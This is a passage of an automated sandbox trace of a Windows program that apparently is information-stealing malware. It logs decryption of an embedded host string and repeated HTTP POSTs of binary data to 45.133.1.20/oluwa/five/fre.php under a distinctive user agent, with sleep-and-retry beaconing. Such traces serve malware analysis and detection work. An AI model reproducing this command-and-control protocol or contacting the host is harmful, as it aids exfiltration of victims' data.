*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.520] GetProcessHeap () returned 0x6a0000 [0262.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba530 [0262.520] GetProcessHeap () returned 0x6a0000 [0262.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.535] GetProcessHeap () returned 0x6a0000 [0262.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0262.535] GetProcessHeap () returned 0x6a0000 [0262.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0262.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.536] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.536] GetProcessHeap () returned 0x6a0000 [0262.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0262.536] GetProcessHeap () returned 0x6a0000 [0262.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.537] send (s=0x904, buf=0x6bd460*, len=242, flags=0) returned 242 [0262.539] send (s=0x904, buf=0x6bb998*, len=159, flags=0) returned 159 [0262.539] GetProcessHeap () returned 0x6a0000 [0262.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0262.539] recv (in: s=0x904, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0262.618] GetProcessHeap () returned 0x6a0000 [0262.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0262.618] GetProcessHeap () returned 0x6a0000 [0262.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0262.620] GetProcessHeap () returned 0x6a0000 [0262.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba530 | out: hHeap=0x6a0000) returned 1 [0262.620] GetProcessHeap () returned 0x6a0000 [0262.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0262.621] closesocket (s=0x904) returned 0 [0262.621] GetProcessHeap () returned 0x6a0000 [0262.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0262.621] GetProcessHeap () returned 0x6a0000 [0262.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.622] GetProcessHeap () returned 0x6a0000 [0262.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0262.623] GetProcessHeap () returned 0x6a0000 [0262.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0262.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1664) returned 0x904 [0262.625] Sleep (dwMilliseconds=0xea60) [0262.627] GetProcessHeap () returned 0x6a0000 [0262.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0262.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0262.661] GetProcessHeap () returned 0x6a0000 [0262.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0262.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.662] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0262.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.666] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.667] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.667] GetProcessHeap () returned 0x6a0000 [0262.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0262.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.668] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0262.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.669] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0262.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.670] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0262.670] GetProcessHeap () returned 0x6a0000 [0262.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.671] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.672] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.676] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.677] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.677] GetProcessHeap () returned 0x6a0000 [0262.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0262.677] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.677] GetProcessHeap () returned 0x6a0000 [0262.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0262.678] GetProcessHeap () returned 0x6a0000 [0262.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.678] GetProcessHeap () returned 0x6a0000 [0262.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0262.679] GetProcessHeap () returned 0x6a0000 [0262.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0262.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.680] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0262.691] GetProcessHeap () returned 0x6a0000 [0262.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0262.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.692] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0262.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.693] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.694] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.694] GetProcessHeap () returned 0x6a0000 [0262.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0262.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.698] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0262.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.699] CryptDestroyKey (hKey=0x6ad020) returned 1 [0262.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.700] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0262.700] GetProcessHeap () returned 0x6a0000 [0262.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.701] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0262.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.702] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0262.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.703] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0262.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.731] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0262.731] GetProcessHeap () returned 0x6a0000 [0262.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0262.732] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0262.732] GetProcessHeap () returned 0x6a0000 [0262.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0262.732] socket (af=2, type=1, protocol=6) returned 0x908 [0262.732] connect (s=0x908, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0262.760] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0262.760] GetProcessHeap () returned 0x6a0000 [0262.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0262.760] GetProcessHeap () returned 0x6a0000 [0262.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0262.761] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.765] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.766] GetProcessHeap () returned 0x6a0000 [0262.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ab0 [0262.766] GetProcessHeap () returned 0x6a0000 [0262.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.767] GetProcessHeap () returned 0x6a0000 [0262.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0262.767] GetProcessHeap () returned 0x6a0000 [0262.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0262.769] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.770] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.770] GetProcessHeap () returned 0x6a0000 [0262.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0262.770] GetProcessHeap () returned 0x6a0000 [0262.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.772] send (s=0x908, buf=0x6bd460*, len=242, flags=0) returned 242 [0262.773] send (s=0x908, buf=0x6bb998*, len=159, flags=0) returned 159 [0262.774] GetProcessHeap () returned 0x6a0000 [0262.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0262.774] recv (in: s=0x908, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0262.865] GetProcessHeap () returned 0x6a0000 [0262.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0262.866] GetProcessHeap () returned 0x6a0000 [0262.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0262.867] GetProcessHeap () returned 0x6a0000 [0262.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ab0 | out: hHeap=0x6a0000) returned 1 [0262.867] GetProcessHeap () returned 0x6a0000 [0262.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0262.868] closesocket (s=0x908) returned 0 [0262.868] GetProcessHeap () returned 0x6a0000 [0262.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0262.868] GetProcessHeap () returned 0x6a0000 [0262.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.869] GetProcessHeap () returned 0x6a0000 [0262.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0262.869] GetProcessHeap () returned 0x6a0000 [0262.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0262.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1668) returned 0x908 [0262.872] Sleep (dwMilliseconds=0xea60) [0262.874] GetProcessHeap () returned 0x6a0000 [0262.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0262.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.875] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.885] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0262.943] GetProcessHeap () returned 0x6a0000 [0262.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0262.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.945] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0262.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.946] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.947] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.947] GetProcessHeap () returned 0x6a0000 [0262.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0262.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.949] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0262.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.953] CryptDestroyKey (hKey=0x6ad020) returned 1 [0262.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.955] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0262.955] GetProcessHeap () returned 0x6a0000 [0262.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.956] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.957] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.959] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.960] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.960] GetProcessHeap () returned 0x6a0000 [0262.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0262.960] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.960] GetProcessHeap () returned 0x6a0000 [0262.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0262.964] GetProcessHeap () returned 0x6a0000 [0262.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.964] GetProcessHeap () returned 0x6a0000 [0262.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0262.965] GetProcessHeap () returned 0x6a0000 [0262.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0262.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0262.984] GetProcessHeap () returned 0x6a0000 [0262.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0263.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.032] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.034] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.034] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.034] GetProcessHeap () returned 0x6a0000 [0263.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0263.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.036] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0263.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.037] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.040] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0263.040] GetProcessHeap () returned 0x6a0000 [0263.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.041] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0263.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0263.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0263.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.044] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0263.044] GetProcessHeap () returned 0x6a0000 [0263.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0263.045] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0263.045] GetProcessHeap () returned 0x6a0000 [0263.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0263.045] socket (af=2, type=1, protocol=6) returned 0x90c [0263.045] connect (s=0x90c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0263.070] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0263.070] GetProcessHeap () returned 0x6a0000 [0263.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0263.071] GetProcessHeap () returned 0x6a0000 [0263.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0263.072] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.073] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.073] GetProcessHeap () returned 0x6a0000 [0263.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0263.074] GetProcessHeap () returned 0x6a0000 [0263.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.075] GetProcessHeap () returned 0x6a0000 [0263.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0263.075] GetProcessHeap () returned 0x6a0000 [0263.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 